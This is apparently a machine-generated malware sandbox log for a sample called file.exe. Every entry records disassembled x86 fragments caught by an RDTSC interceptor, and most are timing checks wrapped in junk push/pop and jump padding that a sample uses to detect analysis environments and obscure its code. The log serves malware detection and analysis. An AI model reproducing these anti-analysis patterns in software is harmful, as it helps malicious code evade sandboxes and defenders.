Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75380 second address: C75384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C76285 second address: C7628F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F626941E956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7745B second address: C77505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F6268DAF3D1h 0x0000000f jmp 00007F6268DAF3CBh 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F6268DAF3C8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 sub bh, 00000038h 0x00000035 push dword ptr fs:[00000000h] 0x0000003c sub dword ptr [ebp+122D24A0h], eax 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F6268DAF3C8h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000018h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 mov edi, dword ptr [ebp+122D225Fh] 0x00000069 mov eax, dword ptr [ebp+122D13D5h] 0x0000006f stc 0x00000070 push FFFFFFFFh 0x00000072 jp 00007F6268DAF3CCh 0x00000078 mov ebx, dword ptr [ebp+122D2BC1h] 0x0000007e push eax 0x0000007f pushad 0x00000080 pushad 0x00000081 jo 00007F6268DAF3C6h 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C792B5 second address: C792DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnp 00007F626941E956h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F626941E961h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C743E4 second address: C743E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75384 second address: C7538A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C77505 second address: C7750E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7B38B second address: C7B3A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F626941E960h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7B3A6 second address: C7B3FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F6268DAF3C8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 je 00007F6268DAF3C6h 0x0000002b mov edi, dword ptr [ebp+122D26B4h] 0x00000031 push 00000000h 0x00000033 jmp 00007F6268DAF3D5h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jbe 00007F6268DAF3CCh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7B3FC second address: C7B400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D45C second address: C7D460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D460 second address: C7D466 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7A468 second address: C7A472 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6268DAF3CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7A55B second address: C7A55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E54F second address: C7E553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D5E3 second address: C7D5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E715 second address: C7E719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7E719 second address: C7E731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F626941E95Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C828C9 second address: C828E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8C90F second address: C8C93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F626941E956h 0x0000000a js 00007F626941E956h 0x00000010 popad 0x00000011 push esi 0x00000012 jnl 00007F626941E95Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F626941E95Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8C93D second address: C8C941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8C941 second address: C8C95D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E968h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8C108 second address: C8C10C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8C10C second address: C8C112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8FB9D second address: C8FBA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8FBA2 second address: C8FBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8FBA8 second address: C8FBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnl 00007F6268DAF3D0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8FBBD second address: C8FBF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jbe 00007F626941E95Eh 0x0000000e ja 00007F626941E958h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d jmp 00007F626941E963h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8FBF0 second address: C8FBF5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8FCE9 second address: C8FD18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F626941E967h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push edx 0x0000001b pop edx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8FEF2 second address: C8FEF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96763 second address: C96769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96769 second address: C9676F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9676F second address: C96778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96778 second address: C96788 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6268DAF3C6h 0x00000008 jp 00007F6268DAF3C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96788 second address: C9679D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F626941E958h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F626941E960h 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C959C7 second address: C959E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C959E4 second address: C959EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C95CC5 second address: C95CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C95CC9 second address: C95CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C95CCD second address: C95CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C95CD3 second address: C95CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F626941E956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9625B second address: C9625F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9625F second address: C96294 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F626941E956h 0x00000008 jmp 00007F626941E969h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F626941E960h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C96404 second address: C96408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C965B9 second address: C965C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C965C2 second address: C965C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C965C8 second address: C965CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A874 second address: C9A878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A878 second address: C9A889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F626941E95Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A889 second address: C9A899 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6268DAF3CAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9AA0C second address: C9AA10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9AA10 second address: C9AA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F6268DAF3C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9AA20 second address: C9AA30 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F626941E956h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9AB89 second address: C9ABB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D7h 0x00000007 jmp 00007F6268DAF3CAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9ABB2 second address: C9ABDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F626941E962h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9ABDD second address: C9ABF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B007 second address: C9B041 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007F626941E956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 js 00007F626941E95Ch 0x00000018 js 00007F626941E956h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F626941E969h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A56A second address: C9A59A instructions: 0x00000000 rdtsc 0x00000002 js 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F6268DAF3C6h 0x0000001c jmp 00007F6268DAF3D4h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A59A second address: C9A59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B30E second address: C9B316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B316 second address: C9B331 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F626941E965h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B331 second address: C9B33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6268DAF3C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B33D second address: C9B341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B4BF second address: C9B4D9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007F6268DAF3C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F6268DAF3D8h 0x00000012 jne 00007F6268DAF3D2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B945 second address: C9B955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F626941E956h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B955 second address: C9B966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 js 00007F6268DAF3CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B966 second address: C9B973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9B973 second address: C9B984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3CBh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2026 second address: CA2035 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2035 second address: CA2048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2048 second address: CA204E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA204E second address: CA2058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F6268DAF3C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0D6A second address: CA0D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jp 00007F626941E956h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0D7D second address: CA0D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0D85 second address: CA0D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0F1D second address: CA0F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1ABB second address: CA1AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jng 00007F626941E958h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F626941E95Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1AD9 second address: CA1ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4DC6F second address: C4DCC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F626941E956h 0x00000009 jbe 00007F626941E956h 0x0000000f jmp 00007F626941E960h 0x00000014 jmp 00007F626941E965h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F626941E95Fh 0x00000020 jmp 00007F626941E961h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C25B2E second address: C25B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C25B32 second address: C25B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F626941E956h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA51DC second address: CA51E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C27624 second address: C27646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626941E967h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C27646 second address: C2764A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2764A second address: C2764E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD7D2 second address: CAD7DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAD7DC second address: CAD7E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C67EF1 second address: C67EFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6268DAF3CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6835E second address: C6839B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F626941E968h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 jns 00007F626941E965h 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6839B second address: C683D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F6268DAF3C8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov edx, edi 0x00000023 push 4C11AB11h 0x00000028 push eax 0x00000029 push edx 0x0000002a jg 00007F6268DAF3C8h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C684CE second address: C684D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68C2B second address: C68C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
